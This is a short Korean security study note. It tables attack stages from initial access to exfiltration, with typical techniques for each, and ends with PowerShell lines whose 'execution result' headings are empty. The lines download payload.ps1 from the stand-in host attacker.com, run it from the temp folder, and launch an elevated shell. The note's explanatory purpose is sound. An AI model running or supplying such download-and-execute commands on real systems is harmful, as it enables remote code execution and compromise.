| 단계 | 설명 | 대표적 기법 |
|---|---|---|
| 1. 초기 침투 (Initial Access) | 공격자가 처음으로 시스템에 접근 | 악성 .lnk, 스피어 피싱 메일, 취약한 원격 접속 |
| 2. 실행 (Execution) | 감염된 시스템에서 실제 악성 코드 실행 | PowerShell, 매크로 실행 |
| 3. 권한 상승 (Privilege Escalation) | 일반 사용자한테 관리자 권한 획득 | UAC 우회, 서비스 하이재킹 |
| 4. 지속성 확보 (Persistence) | 재부팅 후에도 공격자가 계속 접근할 수 있게 준비 | 레지스트리, Scheduled Task |
| 5. 명령 및 제어 (C2) | 공격자가 시스템과 실시간 통신하며 명령 내리고 외부 제어 채널 구축 | Reverse Shell, HTTP Beacon |
| 6. 내부 정찰 (Discovery) | 시스템/네트워크 탐색 | whoami, ipconfig, Get-Process |
| 7. 정보 탈취 / 영향 (Exfiltration / Impact) | 데이터 유출, 시스템 파괴 | 파일 압축/전송, 파괴 명령, 랜섬웨어 배포 |
Invoke-WebRequest -Uri "<http://attacker.com/payload.ps1>" -OutFile "$env:TEMP\\payload.ps1"
Start-Process "powershell.exe" -ArgumentList "-File $env:TEMP\\payload.ps1"
🟡 실행 결과
Invoke-Expression (Get-Content "$env:TEMP\\payload.ps1")
🟡 실행 결과
Start-Process powershell -Verb runAs
🟡 실행 결과